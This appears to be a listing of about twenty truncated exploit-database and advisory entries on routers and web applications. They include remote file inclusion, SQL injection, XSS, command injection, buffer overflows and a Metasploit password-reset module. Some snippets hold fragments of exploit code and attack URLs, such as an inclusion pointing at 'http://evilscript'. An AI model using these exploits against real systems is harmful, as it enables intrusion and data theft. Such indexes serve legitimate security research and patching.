TP-Link TL-WR740N / TL-WR740ND 150M Wireless Lite N Router - HTTP Denial of Service

Exploit title: 150M Wireless Lite N Router HTTP DoS Date: 28.11.2013 Exploit Author: Dino Causevic Hardware Link: http://www.tp-link.com/en/products/details/?model=TL-WR740N Vendor Homepage: http://www.tp-link.com/ Contact: dincaus packetstormsecurity.com CVE: Firmware Version: 3.12.11 Build 1203...

Munin 2.0~rc4-1 - Remote Command Injection

source: https://www.securityfocus.com/bid/53032/info Munin is prone to a remote command-injection vulnerability. Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application. printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost...

WordPress Theme Tuner Plugin 'tt-abspath' Parameter Remote File Inclusion Vulnerability

WordPress is prone to a remote file inclusion vulnerability. SPDX-FileCopyrightText: 2012 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:wordpress:wordpress"...

2Wire Password Reset

require 'msf/core' class Metasploit3 '2Wire Password Reset', 'Version' = '$Revision: 1 $', 'Description' = %Q This module will reset the admin password on a 2wire wireless router. This works by using a setup wizard page that fails to check if a user is authenicated and doesn't remove or block aft...

CollabNet Subversion Edge Log Parser - HTML Injection

source: https://www.securityfocus.com/bid/43378/info CollabNet Subversion Edge is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would run in the context of...

68designs 68kb Multiple RFI Vulnerabilities (Aug 2010) - Active Check

68designs 68kb is prone to multiple remote file include RFI vulnerabilities because it fails to sufficiently sanitize user-supplied data. SPDX-FileCopyrightText: 2010 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right...

NPDS REvolution Blind SQL Injection

Vulnerability ID: HTB22364 Reference: http://www.htbridge.ch/advisory/blindsqlinjectionvulnerabilityinNPDSREvolution.html Product: NPDS REvolution Vendor: NPDS Vulnerable Version: REvolution 10.02 and Probably Prior Versions Vendor Notification: 29 April 2010 Vulnerability Type: Blind SQL Injecti...

KimsQ 040109 Remote File Inclusion

\|/// \ - - // @ @ ----oOOo---oOOo-------------------------------------------------- KimsQ 040109 Multiple Remote File Include Vulnerability Script: http://kimsq.googlecode.com/files/kimsqv040109.zip Author: mat Mail: [email protected]...

eWebeditor - Directory Traversal

eWebeditor - Directory Traversal Application Info: Name: eWebeditor Version: all version Vulnerability Info: Type: Directory Traversal Risk: Medium Vulnerability: http://site.com/admin/ewebeditor/admin/upload.asp?id=16&dviewmode=&dir =./...

PHP-Fusion Mod avatar_studio LFI

No description provided by source. Tested on: Spanish version By modifying "avatarstudio" parameter at POST data at avatarstudio.php you can retrieve all images at that dir. Also using "avatarselect" you can add yourself a file as avatar which may not be .jpg Proof of concept: POST...

Squito Gallery v.1.0 Cross Site Scripting Vulnerability

Exploit for unknown platform in category web applications ======================================================= Squito Gallery v.1.0 Cross Site Scripting Vulnerability =======================================================...

Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]

No description provided by source. !/usr/bin/python Usage : steamcast.py victimeip Bug : SteamcastHTTP Request Remote Buffer Overflow Exploit SEH 1 Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln. Tested on : Xp sp2 fr Exploited by : His0k4 Greetings : All friends &...

RoundCube Webmail <= 0.2b Remote Code Execution Exploit

No description provided by source. !/bin/sh I was hoping the PoC would not appear so soon, but now that it is out, i thought i might as well publish my real exploit. Hunger http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619 FOR LEARNING PURPOSES ONLY! PHP echoiniget'disablefunctions';...

Verity's Search 97查看任意文件漏洞

BUGTRAQ: 162 Verity's Search97是Verity公司搜索引擎的Web访问界面。 Verity's Search97的search97.vts脚本未对用户如入做充分过滤，远程攻击者可能利用此漏洞进行目录遍历攻击，导致系统文件泄漏。 软件包中的search97.vts对用户输入的“..”未做充分过滤，攻击者可能通过构造特殊的请求来读取任何服务器上任何Web服务进程有读权限的文件。 2.1 临时解决方法： 如果您不能立刻安装补丁或者升级，建议您采取以下措施以降低威胁： 暂时停止使用该软件。 厂商补丁： Verity ------...

Words tag script 'index.php' SQL注入漏洞

BUGTRAQ ID: 31011 CNCAN ID：CNCAN-2008090508 Words tag script是一款基于PHP的WEB应用程序。 Words tag script不正确处理用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，可能获得敏感信息或操作数据库。 问题由于'index.php'脚本对用户提交给'word'参数缺少过滤，构建恶意SQL查询作为参数数据，可更改原来的SQL逻辑，获得敏感信息或操作数据库。 Source Workshop Words tag script 1.2 目前没有解决方案提供：...

eSyndiCat 2.2 - register.php Multiple Cross-Site Scripting Vulnerabilities

eSyndiCat 2.2 - register.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/30178/info eSyndiCat is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues t...

PlaySMS <= 0.7 SQL Injection Exploit

No description provided by source. !/usr/bin/perl PlaySMS version 0.7 and prior SQL Injection PoC Written by Noam Rathaus of Beyond Security Ltd. use IO::Socket; use strict; my $host = $ARGV0; my $remote = IO::Socket::INET-new Proto = "tcp", PeerAddr = $host, PeerPort = "80" ; unless $remote die...

Ultimate Fun Book 1.02 - 'function.php' Remote File Inclusion

Ultimate Fun Book 1.02 found by:kezzap66345 contant= : download script=http://www.ultimate-fun-board.de dork:Ultimate-Fun-Book 1.02 file: function.php code: ?php require$gbpfad."/config.php"; exploit: http://target/path/function.php?gbpfad=http://evilscript thanx= x0r0n,str0ke,shakia milw0rm.com...

phpCMS 1.1.7 - 'counter.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks a...

A-Conman Common.Inc.PHP远程文件包含漏洞

A-Conman是一款基于php的WEB应用程序。 A-Conman不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'Common.Inc.PHP'脚本对用户提交的'cmbasedir'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 a-ConMan a-ConMan 3.2b 目前没有解决方案提供： http://www.a-conman.com/...